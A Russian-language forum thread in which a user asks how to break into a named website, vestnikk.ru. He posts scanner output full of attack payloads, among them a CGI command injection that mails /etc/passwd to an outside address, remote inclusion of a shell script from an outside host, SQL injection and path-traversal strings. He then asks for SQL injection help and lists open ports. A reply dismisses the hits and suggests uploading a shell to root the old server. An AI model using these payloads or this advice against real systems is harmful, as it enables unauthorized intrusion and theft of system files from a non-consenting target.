Взлом vestnikk.ru

[Avox]

Сам по толку не разбираюсь. Просканил Ru24Tools:

Найдено: http://vestnikk.ru/?PageServices
Найдено: http://vestnikk.ru/?wp-cs-dump
Найдено: http://vestnikk.ru/?wp-html-rend
Найдено: http://vestnikk.ru/?wp-stop-ver
Найдено: http://vestnikk.ru/?wp-uncheckout
Найдено: http://vestnikk.ru/?wp-usr-prop
Найдено: http://vestnikk.ru/?wp-ver-diff
Найдено: http://vestnikk.ru/?wp-verify-link
Найдено: http://vestnikk.ru/?wp-ver-info
Найдено: http://vestnikk.ru/index.php?IDAdmin=test
Найдено: http://vestnikk.ru/cgi-bin/finger?tiedotus@uta.fi%3B%2Fbin%2Fmail+durito@mail.ru+%3C+etc%2Fpasswd
Найдено: http://vestnikk.ru/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
Найдено: http://vestnikk.ru/error/HTTP_NOT_FOUND.html.var
Найдено: http://vestnikk.ru/index.php
Найдено: http://vestnikk.ru/index.php?base=test
Найдено: http://vestnikk.ru/index.php?SqlQuery=test
Найдено: http://vestnikk.ru/index.php
Найдено: http://vestnikk.ru/index.php?tampon=test
Найдено: http://vestnikk.ru/
Найдено: http://vestnikk.ru/index.php?name=Members_List&letter=All&sortby=pass 
Найдено: http://vestnikk.ru/index.php?name=Members_List&letter=All&sortby=uid 
Найдено: http://vestnikk.ru/index.php?name=Members_List&letter='OR user_level='4'/* 
Найдено: http://vestnikk.ru/robots.txt
Найдено: http://vestnikk.ru/stats.htm
Найдено: http://vestnikk.ru/user/
Найдено: http://vestnikk.ru/webmail/
Найдено: http://vestnikk.ru/phpMyAdmin/
Найдено: http://vestnikk.ru/phpMyAdmin/sql.php
Найдено: http://vestnikk.ru/phpmyadmin/
Найдено: http://vestnikk.ru/index.php?name=Web_Links&ratinglid=96&ratinguser=?&ratinghost_name=?&rating=99999999999999999999999
Найдено: http://vestnikk.ru/index.php?do=ext&page=http://bugdurito.narod.ru/cmd.php&cmd=id
Найдено: http://vestnikk.ru/index.php?method=`
Найдено: http://vestnikk.ru/index.php?a=lostpw&set=1&id=`
Найдено: http://vestnikk.ru/index.php?a=lostpw&set=1&session_id=`
Найдено: http://vestnikk.ru/index.php?showforum=1&prune_day=100&sort_by=Z-A&sort_key=
Найдено: http://vestnikk.ru/index.php?method=`
Найдено: http://vestnikk.ru/index.php?a=lostpw&set=1&id=`
Найдено: http://vestnikk.ru/index.php?a=lostpw&set=1&session_id=`
Найдено: http://vestnikk.ru/phpMyAdmin/export.php?what=../../../../../../etc/passwd%00
Найдено: http://vestnikk.ru/?page=account/shipto&user_info_ id=
Найдено: http://vestnikk.ru/?page='
Найдено: http://vestnikk.ru/?page=shop/cart&func=cartAdd&product_id='
Найдено: http://vestnikk.ru/?page=shop/browse&category_id=&offset='
Найдено: http://vestnikk.ru/?page=admin/index&GulfTech=">
Найдено: http://vestnikk.ru/index.php?option=content&task=view&id='

За интересовала строка: http://vestnikk.ru/phpMyAdmin/
Выполняю http://vestnikk.ru/phpMyAdmin/scripts/setup.php
phpMyAdmin 2.11.11.3
Подскажите, как правильно сделать SQL INJECTION. Или метод http://vestnikk.ru/phpMyAdmin/export.php?w..../etc/passwd%00

UPD
Просканил порты:
22/tcp - SSH
53/tcp - DNS
53/udp - DNS
443/tcp - HTTP SSL
3306/tcp - MySql
8080/tcp - HTTP
21/tcp - FTP

 

[12309]

> Найдено: траливали

там все 404 ошибки выдаются как 301 редирект, на главную страницу. поэтому он и http://vestnikk.ru/х#йпиздаджигурда/ найдёт.

> Can not load or save configuration
> Please create web server writable folder config in phpMyAdmin toplevel directory as described in documentation. Otherwise you will be only able to download or display it.

не похекоеш.

> Или метод http://vestnikk.ru/phpMyAdmin/export.php?w..../etc/passwd%00

не похекоеш.

на сервере стоит центось со старым софтом, если сможешь залить шелл, есть вероятность порутать.